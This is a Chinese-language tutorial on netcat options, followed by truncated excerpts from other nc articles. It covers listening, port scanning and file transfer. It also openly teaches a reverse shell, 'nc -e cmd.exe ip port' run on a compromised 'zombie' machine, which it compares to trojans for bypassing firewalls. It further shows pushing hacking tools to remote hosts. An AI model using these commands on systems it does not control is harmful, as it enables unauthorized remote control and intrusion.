nc.exe -h即可看到各引數的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 後台模式
-e prog 程式重定向,一旦連線,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-g num source-routing pointer: 4, 8, 12, ...
-h 幫助資訊
-i secs 延時的間隔
-l 監聽模式,用於入站連線
-l 連線關閉後,仍然繼續監聽
-n 指定數字的ip位址,不能用hostname
-o file 記錄16進製制的傳輸
-p port 本地埠號
-r 隨機本地及遠端埠
-s addr 本地源位址
-t 使用telnet互動方式
-u udp模式
-v 詳細輸出--用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉--用於掃瞄時
埠的表示方法可寫為m-n的範圍格式。
命令1:監聽命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
引數解釋:
-l:監聽埠,監聽入站資訊
-p:後跟本地埠號
-v:顯示埠的資訊,如果使用-vv的話,則會顯示埠更詳細的資訊
nc -l -p 80
這個很簡單,監聽80埠
如果機器上執行這個命令,埠80被認為是開放的,可以欺騙掃瞄器
nc -l -p 80 > e:\log.dat
將詳細資訊寫入e盤log.dat的日誌檔案
nc -l -v -p 80
和上邊命令相似,會直接顯示資訊在執行著nc的螢幕上。
實踐:例如:nc -l -v -p 80
然後在瀏覽器中輸入本機ip:127.0.0.1
命令2:程式定向(**shell的方法)
nc -l -p port -t -e cmd.exe
本地機: nc -l -p port 或 nc -l -v -p port
目標機:nc -e cmd.exe ip port
引數解釋:
-l、-p兩個引數已經解釋過了
-e:作用就是程式定向
-t:以telnet的形式來應答
例子nc -l -p 5277 -t -e cmd.exe
千萬不要執行在自己的機器上,如果執行了,你機器就會變成一台telnet的伺服器了。
命令解釋為:監聽本地埠5277的入站資訊,同時將cmd.exe這個程式,重定向到埠5277上,當有人連線的時候,就讓程式cmd.exe以telnet的形式來響應連線要求。
說白了,其實就是讓他成為一台telnet的肉雞。
所以 -e cmd.exe 這個命令要執行在你的肉雞上。如下:
local machine(主人機器,需要先啟動):nc -l -p port ( or nc -l -v -p port )
remote machine(被攻陷的機器,肉雞):nc -e cmd.exe ip port
這樣肉雞執行「nc -e cmd.exe ip port」命令時,主人機器直接變成了肉雞的cmd命令視窗,可以對肉雞操控。也就是說肉雞可以位於防火牆內部,可以連線到主人的外網機器。等於實現了反向**。
大家知道灰鴿子和神偷吧,這兩款工具都是利用了**埠型的木馬,
什麼叫**埠?
就是說,當對方中馬後,不用你主動和對方連線,也就是說不用從你的client端向對方主機上執行的server端傳送請求連線,而是對方主動來連線你這樣就可以使很多防火牆失效,因為很多防火牆都不檢查出站請求的。這裡這兩個命令結合在一起後,於那兩款木馬可以說有異曲同工之效。
示例:
本地執行:nc -l -p 5277 (監聽本地5277埠)或者 nc -l -v -p 5277
然後在遠端機器肉雞上,想辦法執行 nc -e cmd.exe ip 5277
這樣就是**~~在本地主人機器上得到了乙個shell
命令3:掃瞄埠
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
引數解釋:
-z:將輸入輸出關掉,在掃瞄時使用
nc -v ip port
這個命令是針對某乙個埠進行掃瞄
例如:nc -v ip 135
掃瞄遠端主機的135埠,這樣獲得了該埠的一些簡單資訊,但是針對某些埠,我們還可以獲得更多的資訊
例如:80埠
我們可以使用nc -v ip 80 然後使用get方法來獲得對方的web伺服器的資訊
nc -v -z ip port-port
這個命令是用來掃瞄的乙個命令,這個命令用於快速掃瞄tcp埠,而port-port則是指定了掃瞄的埠範圍
例如:nc -v -z ip 1-200
可以看到我機器上的1-200的tcp埠的開放情況
nc -v -z -u ip port-port
這個命令比上個命令多了個-u,這個命令的作用仍然是掃瞄埠,只是多了乙個-u的引數,是用來掃udp埠的
例如:nc -v -z -u ip 1-200
這個命令就會掃1-200的udp埠
命令4:傳送檔案(hoho,i like)
local machine:nc -v -n ip port < x:\svr.exe
remote machine:nc -v -l -p port > y:\svr.exe
引數解釋:
這兩個命令結合起來是用來傳送檔案的
首先,在遠端機上執行命令:
nc -v -l -p 5277 > c:\pulist.exe
這個命令還記的嗎?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277埠
並把接受到的資訊資料寫到c:\pulist.exe中
這時候在本地機上執行
nc -v -n ip 5277 < e:\hack\pulist.exe
這個命令的意思就是,從本地e盤跟目錄中讀取pulist.exe檔案的內容,並把這些資料傳送到ip的5277埠上
這樣遠端主機就會自動建立乙個pulist.exe檔案。
1)連線到remote主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的tcp80埠
2)監聽local主機,例子:
格式:nc -l -p 80
講解:監聽本機的tcp80埠
3)掃瞄遠端主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃瞄192.168.x.x的tcp80到tcp445的所有埠
nc使用筆記
g 閘道器 設定路由器躍程通訊網關,最多可設定8個。g 指向器數目 設定 路由指向器,其數值為4的倍數。i 延遲秒數 設定時間間隔,以便傳送資訊及掃瞄通訊埠。l 使用監聽模式,管控傳入的資料。n 直接使用ip位址,而不通過網域名稱伺服器。o 輸出檔案 指定檔名稱,把往來傳輸的資料以16進製制字碼傾倒...
nc 命令使用詳解
nc 命令介紹 我們通過 ll 命令檢視nc 命令 benchmarks ll usr bin nc lrwxrwxrwx.1 root root 4 feb 19 19 09 usr bin nc ncat name cat concatenate files and print on the s...
NC 的簡單使用
netcat被譽為網路安全界的 瑞士軍刀 相信沒有什麼人不認識它吧 乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路連線,還有幾個很...